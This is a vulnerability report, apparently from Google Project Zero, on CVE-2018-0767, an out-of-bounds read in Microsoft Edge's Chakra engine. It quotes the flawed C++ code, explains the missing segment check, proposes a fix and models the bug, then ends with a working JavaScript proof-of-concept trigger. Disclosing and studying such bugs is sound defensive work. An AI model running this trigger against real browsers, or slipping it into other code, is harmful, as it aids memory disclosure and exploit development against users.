Microsoft Edge Chakra suffers from an out-of-bounds read in AppendLeftOverItemsFromEndSegment.
Microsoft Edge: Chakra: OOB read in AppendLeftOverItemsFromEndSegment
CVE-2018-0767
Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl.
    growby = endSeg->length;
    current = current->GrowByMin(recycler, growby);
    CopyArray(current->elements + endIndex + 1, endSeg->length,
              ((Js::SparseArraySegment<T>*)endSeg)->elements, endSeg->length);
    LinkSegments((Js::SparseArraySegment<T>*)startPrev, current);
    if (HasNoMissingValues())
    {
        if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
        {
            SetHasNoMissingValues(false);
        }
    }
The ScanForMissingValues method scans "head", but the code above never checks that the grown segment "current" is actually "head" before calling it. The indices endIndex + 1 .. endIndex + growby describe the newly copied items in "current", so when "current" is some other segment the scan applies them to "head" and reads past its allocation.
I guess it should be like:
    if (current == head && HasNoMissingValues())
    {
        if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
        {
            SetHasNoMissingValues(false);
        }
    }
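To make the mismatch concrete, here is an added model (not Chakra's code) of the two segments involved: a scan that indexes "head" with offsets that belong to "current", with and without the guard proposed above. Segment, scanReadsOutOfBounds and appendScanReadsOutOfBounds are hypothetical stand-ins; the sizes in the scenario are constructed to resemble the PoC's layout.

```cpp
#include <cstddef>
#include <vector>

// Hypothetical stand-in for Chakra's SparseArraySegment (not the real type):
// `elements` is the segment's allocation, `left` its starting array index.
struct Segment {
    size_t left;
    std::vector<double> elements;
};

// Model of ScanForMissingValues<T>(start, end): the report notes it reads
// head->elements, so any index in [start, end] at or past head's allocation
// is an out-of-bounds read. We report that instead of dereferencing it.
bool scanReadsOutOfBounds(const Segment& head, size_t start, size_t end) {
    for (size_t i = start; i <= end; ++i) {
        if (i >= head.elements.size()) {
            return true;
        }
    }
    return false;
}

// Model of the tail of AppendLeftOverItemsFromEndSegment after `current`
// has grown by `growby`. `patched` applies the guard proposed in the
// report (`current == head`) before scanning.
bool appendScanReadsOutOfBounds(const Segment& head, const Segment& current,
                                size_t endIndex, size_t growby, bool patched) {
    if (patched && &current != &head) {
        return false;  // scan skipped: the indices do not belong to head
    }
    return scanReadsOutOfBounds(head, endIndex + 1, endIndex + growby);
}

// Constructed scenario shaped like the PoC: a small head segment and a large
// segment far away (around index 0x7777) that has just been grown.
bool scenarioReadsOutOfBounds(bool patched) {
    Segment head{0, std::vector<double>(4, 0.0)};             // arr[0..3]
    Segment current{0x7777, std::vector<double>(2016, 0.0)};  // already grown
    const size_t endIndex = 1999;  // last index of current's old contents
    const size_t growby = 16;      // endSeg->length
    return appendScanReadsOutOfBounds(head, current, endIndex, growby, patched);
}
```

Without the guard the scan walks indices 2000..2015 against a 4-element head allocation; with it the scan is skipped because current is not head.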
PoC:
    function trigger() {
        let arr = [1.1];
        let i = 0;
        for (; i < 1000; i += 0.5) {
            arr[i + 0x7777] = 2.0;
        }
        arr[1001] = 35480.0;
        for (; i < 0x7777; i++) {
            arr[i] = 1234.3;
        }
    }

    for (let i = 0; i < 100; i++) {
        trigger();
    }
This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
Found by: lokihardt